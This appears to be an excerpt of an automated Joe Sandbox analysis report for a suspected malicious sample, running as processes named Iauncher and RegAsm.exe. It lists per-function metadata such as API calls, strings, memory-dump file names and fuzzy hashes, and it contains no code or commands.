Function 00F19D8D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00F19DB2

Strings

MOC, xrefs: 00F19DC4
RCC, xrefs: 00F19DCC

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: badf9446feb659dbc4616fe04210cc141a0e1d3aeb7b83b27f1d3370fd771fbe
Instruction ID: ebef460b67cbbb61f5e40bed6c4db2ba20bd359af1f1a43520bbe1f051d35206
Opcode Fuzzy Hash: badf9446feb659dbc4616fe04210cc141a0e1d3aeb7b83b27f1d3370fd771fbe
Instruction Fuzzy Hash: 53419A72D04209AFCF15CF94CD81AEEBBB5FF48310F194099FA05A7221D3B59991EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F11FF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00F12000
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F12038

Part of subcall function 00F1472C: _Yarn.LIBCPMT ref: 00F1474B
Part of subcall function 00F1472C: _Yarn.LIBCPMT ref: 00F1476F

Strings

bad locale name, xrefs: 00F12046

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 0f9ff2a017ecaae271a82eb0cbf569e123d5f82c5587aeb62229c8f52101d401
Instruction ID: cbd659f437363cf8cb9dbde800fb343ef10205373d3611122d8e145883fe8d2a
Opcode Fuzzy Hash: 0f9ff2a017ecaae271a82eb0cbf569e123d5f82c5587aeb62229c8f52101d401
Instruction Fuzzy Hash: D1F01771505B809E83319FBA8881487FBE4BE293603908A2EE0DEC3A11D734F444DB6A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 7452, Parent PID: 7404COMMON

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	134
Total number of Limit Nodes:	11

Executed Functions

Function 06043F50 Relevance: 1.8, Strings: 1, Instructions: 528
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 060441E4

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: e6c0c39905c5c8978187da858e9d7d68e921c9c0fcb61c713b8fc42a09e4ba0f
Instruction ID: c935436f9c1e3fbe7dcc677de35e6e1b80d657dcee00bb21f124863d5055d734
Opcode Fuzzy Hash: e6c0c39905c5c8978187da858e9d7d68e921c9c0fcb61c713b8fc42a09e4ba0f
Instruction Fuzzy Hash: A7124C74B402158FCB54EF69C494A6EBBF6FF88700B158569E905EB365DB30EC42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 060467D8 Relevance: .4, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21193df333023c2b140c77cd8a1aa3e452cf096333708986be3d5322f72106cd
Instruction ID: 81e86717174448e78884d6ed1e4b3632bc6581b1a8d140cc7e262646cacb23ec
Opcode Fuzzy Hash: 21193df333023c2b140c77cd8a1aa3e452cf096333708986be3d5322f72106cd
Instruction Fuzzy Hash: 2EF1B170A102199FDB55EFA8D880B9EBFF2EF85300F148569E409EB251DB35ED45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0604A3D8 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9429e5a709c1a82e199d2350168dd6eecdc41ceaa2d0c9a51c564517f31a9167
Instruction ID: 45aeba596da6eead186a43b7c6135235c42e82882b622b134de116838331f876
Opcode Fuzzy Hash: 9429e5a709c1a82e199d2350168dd6eecdc41ceaa2d0c9a51c564517f31a9167
Instruction Fuzzy Hash: 49D12734D00219CFCB28EFB4D854AADBBB2FF8A301F1085A9D50AAB254DB355996CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0604A3E8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9dc40be2bff31aefaf497c030a37f505e13390cbfa688e5b40e4a431d26c815
Instruction ID: c8ae4d1f68d7628c6d39fcd60b69490076921e4920c437a61e3fe7a5065625b9
Opcode Fuzzy Hash: f9dc40be2bff31aefaf497c030a37f505e13390cbfa688e5b40e4a431d26c815
Instruction Fuzzy Hash: 4DD10634E00219DFCB28EFB4D854A9DBBB2FF8A301F1085A9D50AAB254DF355996CF11

Uniqueness

Uniqueness Score: -1.00%

Function 06021298 Relevance: 10.2, Strings: 8, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 060213AC
$^q, xrefs: 0602137B
$^q, xrefs: 060213EB
$^q, xrefs: 06021455
$^q, xrefs: 060213A0
$^q, xrefs: 06021461
$^q, xrefs: 06021336
$^q, xrefs: 06021430

Memory Dump Source

Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: fbd561367c1cc20569dc6acaca25cfd74f12cc770301cc93742d0421eb12a36d
Instruction ID: 1e16a7aa13781d97853d1dcd3dfb7e9dcf88ac3226589ad69410e74aa149eb0b
Opcode Fuzzy Hash: fbd561367c1cc20569dc6acaca25cfd74f12cc770301cc93742d0421eb12a36d
Instruction Fuzzy Hash: 5D6127747402259FD7989BA9D844A3E7BE7BF88704B108499EB068F396CF70DC45C791

Uniqueness

Uniqueness Score: -1.00%

Function 06021582 Relevance: 7.8, Strings: 6, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06021A12
$^q, xrefs: 06021A7C
$^q, xrefs: 060218E3
$^q, xrefs: 06021A88
$^q, xrefs: 06021A57
$^q, xrefs: 0602182E

Memory Dump Source

Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 4f256ef789ed174dde853c855bf638acfa47327939c950637e918535dd65e9e4
Instruction ID: 3fac98043107b8d55ebb1d2b16bad61afa34e3cbf843bb9b4db746bcc8d6204c
Opcode Fuzzy Hash: 4f256ef789ed174dde853c855bf638acfa47327939c950637e918535dd65e9e4
Instruction Fuzzy Hash: BFC1D134B402268FDB949B68C854A3E7FF6EF89704F60849AE6068B392DF74DC45C791

Uniqueness

Uniqueness Score: -1.00%

Function 06021295 Relevance: 2.6, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 060213EB
$^q, xrefs: 06021336

Memory Dump Source

Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 7af5266585167f4b152dd3d32d9e221cbd897058e3237d6126c2d7e157ebcb84
Instruction ID: c9c8d9ba64945395eb3e345a3d620271176c0bcd29c7fbd5ddce392c522f53c7
Opcode Fuzzy Hash: 7af5266585167f4b152dd3d32d9e221cbd897058e3237d6126c2d7e157ebcb84
Instruction Fuzzy Hash: B34107B47402265FD7849AA8D854A3B3AEBEF89704F1184A9FB028B391CFB1DC45C791

Uniqueness

Uniqueness Score: -1.00%

Function 00BCAE30 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00BCB086

Memory Dump Source

Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 587b324f54cea33aa47eb9fbe2a2acf9d2428ca06e301876bc3a1e451370ebed
Instruction ID: 70e7db4f8ac2e6ce3e5c85ae915f5aa241ba635a8ce1f273442ecfc89dfb1d7c
Opcode Fuzzy Hash: 587b324f54cea33aa47eb9fbe2a2acf9d2428ca06e301876bc3a1e451370ebed
Instruction Fuzzy Hash: EE7159B0A00B098FD724DF29D445B5ABBF1FF88708F10896DE48AD7A40D775E946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04D31CE4 Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D31E02

Memory Dump Source

Source File: 00000004.00000002.1984230763.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d30000_RegAsm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 62917995c23ec5aad03c208307b25a296336096812878b88521d336221df74f0
Instruction ID: 73b1449c175aca1f093f511dfde6b01e2ebdbe802f56fd3d58b74b84345baa79
Opcode Fuzzy Hash: 62917995c23ec5aad03c208307b25a296336096812878b88521d336221df74f0
Instruction Fuzzy Hash: 3051C2B1D10319DFDB14CFA9C884ADEBBB5FF48310F64852AE819AB210DB71A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04D30AA8 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D31E02

Memory Dump Source

Source File: 00000004.00000002.1984230763.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d30000_RegAsm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 10233285f8d77983b61f4e9cffefb54ee4ca2ed8fffda810e4dfb180f2c4a51e
Instruction ID: 5d552252e96a8dfae0dba7c27dd8188b1317cfe83bb23c61a962c54acb9592dc
Opcode Fuzzy Hash: 10233285f8d77983b61f4e9cffefb54ee4ca2ed8fffda810e4dfb180f2c4a51e
Instruction Fuzzy Hash: 8151C0B1D003099FDB14CFA9C984ADEBBB5FF48314F64812AE819AB210DB71A845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5935 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00BC59F1

Memory Dump Source

Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c96700ecc70e820bf561bb41f73ad428fc1b4b6d331c10bd214ea554dc243d99
Instruction ID: 9280f4680f63ca851072c5d75af6f6fb5637c14e4a8a20424cbf857c0c3fc662
Opcode Fuzzy Hash: c96700ecc70e820bf561bb41f73ad428fc1b4b6d331c10bd214ea554dc243d99
Instruction Fuzzy Hash: B141F2B0D00719CBDB24DFA9C884B9DBBF5FF44308F24815AD409AB251DB75698ACF50

Uniqueness

Uniqueness Score: -1.00%

Function 04D30BFC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04D34381

Memory Dump Source

Source File: 00000004.00000002.1984230763.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d30000_RegAsm.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 3e76d275dbd1cc8e4f8b0df85dff0365876fdb9b332b83d16ede7197c4577d06
Instruction ID: b5a959c6279d7bb6ff7f2e87a561f839410c8b0b1c42daf677edc36e29bae904
Opcode Fuzzy Hash: 3e76d275dbd1cc8e4f8b0df85dff0365876fdb9b332b83d16ede7197c4577d06
Instruction Fuzzy Hash: 494138B8A00309DFDB14DF99C448AAABBF5FF88319F24C559D519AB321D734E845CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00BC59F1

Memory Dump Source

Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ff3b03f9a71573b250ab23f740b985f52f379f17a2f559b627b947cedde4ab11
Instruction ID: d475c99e57d9309cfe22505d69a31e753141650c203bdf75bffef0b7b849785d
Opcode Fuzzy Hash: ff3b03f9a71573b250ab23f740b985f52f379f17a2f559b627b947cedde4ab11
Instruction Fuzzy Hash: 6641E3B0D00719CBDB24DFAAC884B9DBBF5FF44314F2481AAD409AB251DB756989CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BCC9A0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00BCD2C6,?,?,?,?,?), ref: 00BCD387

Memory Dump Source

Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8bf44866700c077cdad62a239739c7678c1e0b277356fe9b8b1edd183430cd78
Instruction ID: 440b8c8dc2f9daecf6e068062ccbbf3a84a751cab454b95dc3a09f0157b14786
Opcode Fuzzy Hash: 8bf44866700c077cdad62a239739c7678c1e0b277356fe9b8b1edd183430cd78
Instruction Fuzzy Hash: FF21E4B59003489FDB10CF9AD984BDEBBF4EB48320F14846AE918A3310D374A954DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB2A0 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00BCB101,00000800,00000000,00000000), ref: 00BCB312

Memory Dump Source

Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ba84353ba65dcec4828c620cfdc624dd0ea0505d055cc79dc00564c140715a6d
Instruction ID: 247d733d9c663dd9c4c14f0b089da161e781915475e0a5d56590d00121aedb9d
Opcode Fuzzy Hash: ba84353ba65dcec4828c620cfdc624dd0ea0505d055cc79dc00564c140715a6d
Instruction Fuzzy Hash: AE1126B68003498FDB14DFAAC845BDEFBF4EB88311F10845ED829A7200C374A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BCA870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00BCB101,00000800,00000000,00000000), ref: 00BCB312

Memory Dump Source

Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 95d7f698084cf9662d204061ed998cd9497820ea35799c5b3e4ae5424511216b
Instruction ID: ce578d05aa9cd64483f65760e5018e7ab2fba4e38f90c14a7dca5a9a7df44f0b
Opcode Fuzzy Hash: 95d7f698084cf9662d204061ed998cd9497820ea35799c5b3e4ae5424511216b
Instruction Fuzzy Hash: B61112B6D003499FDB10DF9AC845B9EFBF4EB88325F10846EE919A7200C374A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00BCB086

Memory Dump Source

Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: aadbcf3fdca92d3f7842b1f6c5123d356c222776e2fcc042cf3996965fbcd13a
Instruction ID: f6bc776140ef5748b44e507def3a2e00bf31e2ccfc7e36c60b5c2fb83a4fc4d6
Opcode Fuzzy Hash: aadbcf3fdca92d3f7842b1f6c5123d356c222776e2fcc042cf3996965fbcd13a
Instruction Fuzzy Hash: 4711CDB6C007498ACB24DF9AC845B9EFBF4EB88325F14845ED829A7210C375A549CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 060459C8 Relevance: 1.5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

d, xrefs: 06045C29

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 2a78a78c8134aa5294ee7c044f595689640d1ce9d4bfe8d27b3ab618203f93b6
Instruction ID: 0cb94a3373e250d6deed75926c854955c95601aeca0590cdbdea9497c0a4bf0e
Opcode Fuzzy Hash: 2a78a78c8134aa5294ee7c044f595689640d1ce9d4bfe8d27b3ab618203f93b6
Instruction Fuzzy Hash: 77C17C75600602CFCB65DF18C88096ABBF2FF88310B25CA69D55A9B765DB30FC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06021BA0 Relevance: 1.4, Instructions: 1439COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3819d99df0d3b26a931ae984403c6b581a368a1dd96b4a5510719fb8fac9ef17
Instruction ID: 2d28a146e3a4b83f24e58108e74baad962d69454d904f5ca9044747706dad265
Opcode Fuzzy Hash: 3819d99df0d3b26a931ae984403c6b581a368a1dd96b4a5510719fb8fac9ef17
Instruction Fuzzy Hash: 1CC25374B401189FDB55DF64C851AAEBBB6FF88700F108099E606AB3A1DB71EE41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06043DE0 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06043F25

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 3029086b65da5f08c9cbd3f29856f7a9820dd77468e08d12422a54ff9d16a021
Instruction ID: c8a822e3706b1ffaa245a377ba200641e121ba17b6a805e8559c9a065821b7be
Opcode Fuzzy Hash: 3029086b65da5f08c9cbd3f29856f7a9820dd77468e08d12422a54ff9d16a021
Instruction Fuzzy Hash: 3831EF757006204FC729A738A49166E7BE6DFCA71271948BAE0098B385DE35EC0787A0

Uniqueness

Uniqueness Score: -1.00%

Function 060484C8 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

4'^q, xrefs: 060485B1

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: e65a8bdfbfd309b74e99dfdd5ba7e6950b67263113703cc1c965f1cb5bb61c65
Instruction ID: 066d7b417077d29280137e219fc3d133894cef34cdaff57b65ee121b8bcb1f41
Opcode Fuzzy Hash: e65a8bdfbfd309b74e99dfdd5ba7e6950b67263113703cc1c965f1cb5bb61c65
Instruction Fuzzy Hash: 9031A1757002148FCB09EB78A55957E3BE2AFC8205754483DE50ADB385EF39ED0687E1

Uniqueness

Uniqueness Score: -1.00%

Function 0604B358 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0604B399

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 8b168a5e8ef5936ac0805c33a19157597e26cad7cd0d529f0aceda3f78005d96
Instruction ID: f7e1f11352d6fa044adf22b106e9a54305fbe96b421c25374c9b5d8e9d7d1389
Opcode Fuzzy Hash: 8b168a5e8ef5936ac0805c33a19157597e26cad7cd0d529f0aceda3f78005d96
Instruction Fuzzy Hash: 7F01DF30902285EFCB05EFB8E99459CBFF2FF45301B144A9AD449D7215DF305A88CB10

Uniqueness

Uniqueness Score: -1.00%

Function 06043EC8 Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06043F25

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 1c42c2fb074f3665fa9eba04e481265bcd078bccdda052f2aa1fec0e3d29a83b
Instruction ID: 5d9a44fdb633a21ae8643904181add2cc49c4e52586f6ee054fde30414e62972
Opcode Fuzzy Hash: 1c42c2fb074f3665fa9eba04e481265bcd078bccdda052f2aa1fec0e3d29a83b
Instruction Fuzzy Hash: 17F090353006114FC618FB29E85596F7BEADFC96123544D29E00E8B318EE34BD4687E5

Uniqueness

Uniqueness Score: -1.00%

Function 0604B368 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0604B399

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: d08814fb81266c3c3f770cce63f6d1c1805411d72b6691d5b8ccab33049d751e
Instruction ID: ffe71bf359716b2df0d55f20f7bb30e8d9d33d5e5847b68a3a4eddc56f0df3fa
Opcode Fuzzy Hash: d08814fb81266c3c3f770cce63f6d1c1805411d72b6691d5b8ccab33049d751e
Instruction Fuzzy Hash: 71F0AF70A02249EFCB04EFB8E48559DBBF2FB44301B1449A9D40A97318DF301E84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 060200D8 Relevance: .7, Instructions: 676COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74926a929f6312571bb98cf32279d6f72d4fb93c21477cc449f2334d12b20c5c
Instruction ID: 7024140f2d466ea1911d37a1080bfe93b7c0798f5a9cec100cd8b3ea7156c9f6
Opcode Fuzzy Hash: 74926a929f6312571bb98cf32279d6f72d4fb93c21477cc449f2334d12b20c5c
Instruction Fuzzy Hash: C0426A707407298FCB64AF78D450A2E7AF2FF85705B408A5CD5079B391CB7AED058B86

Uniqueness

Uniqueness Score: -1.00%

Function 06020598 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec5f2c5124241b31617d7da9916de7e374e9e09c9180a40b7e767758392d22ed
Instruction ID: 6650c92ea1a838d463f6b64333330cb50a052e1d82226d74c6d7a7b722c0549c
Opcode Fuzzy Hash: ec5f2c5124241b31617d7da9916de7e374e9e09c9180a40b7e767758392d22ed
Instruction Fuzzy Hash: 5E02AB30B407258FDB549B68D454B2E7AF2FF89705F408999D5039B3A2CBBAEC45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06020610 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9408f1414c41b977548b5218a20002f552aed05b5c7de0ff6ab35cf30c405507
Instruction ID: 255d3372f8a3aa5ddca4752b191f02573a9b576cd48abdcc8eb97d77a4168b6f
Opcode Fuzzy Hash: 9408f1414c41b977548b5218a20002f552aed05b5c7de0ff6ab35cf30c405507
Instruction Fuzzy Hash: 4402AD30B403258FDB549B68C858B2E7AF6FF89705F408859D5039B3A1CBBAED45CB91

